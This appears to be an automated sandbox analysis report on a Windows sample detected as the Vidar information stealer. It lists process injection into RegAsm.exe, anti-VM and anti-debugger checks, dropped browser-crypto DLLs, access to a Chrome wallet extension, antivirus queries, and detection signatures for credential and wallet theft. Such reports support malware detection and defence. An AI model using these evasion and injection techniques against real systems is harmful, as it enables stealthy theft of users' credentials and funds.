Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR

Country aware sample found (crashes after keyboard check)

Source: c:\users\user\desktop\file.exe

Event Logs and Signature results: Application crash and keyboard check

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 4EC0000 memory reserve \| memory write watch	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlm[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 6.7 %

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410220 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410352h

3_2_00410220

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D200 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416310 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	3_2_00416310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004173B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_004173B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A410 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00416B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040AF10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040AF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A860 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416FA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	3_2_00416FA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00416750 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,

3_2_00416750

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004103F0 GetSystemInfo,wsprintfA,

3_2_004103F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1976459689.000000000161D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware8[6
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041A2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_0041A2BF

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004181D0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410050 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,

3_2_00410050

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041A2BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041F398 SetUnhandledExceptionFilter,	3_2_0041F398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041B7E7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041B7E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C70B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6C70B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C70B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C70B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C92AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C92AC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: file.exe, Angelo.cs	Reference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(text.ToLower()), "FreeConsole")
Source: file.exe, Angelo.cs	Reference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(text.ToLower()), "FreeConsole")
Source: file.exe, Angelo.cs	Reference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(text.ToLower()), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

0_2_02EC2111

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411A90 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

3_2_00411A90

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1175008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C70B341 cpuid

3_2_6C70B341

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		3_2_00410220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,LocalFree,		3_2_00410299

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410150 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

3_2_00410150

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004100D0 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_004100D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004101B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_004101B0

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.3ec5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ec5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

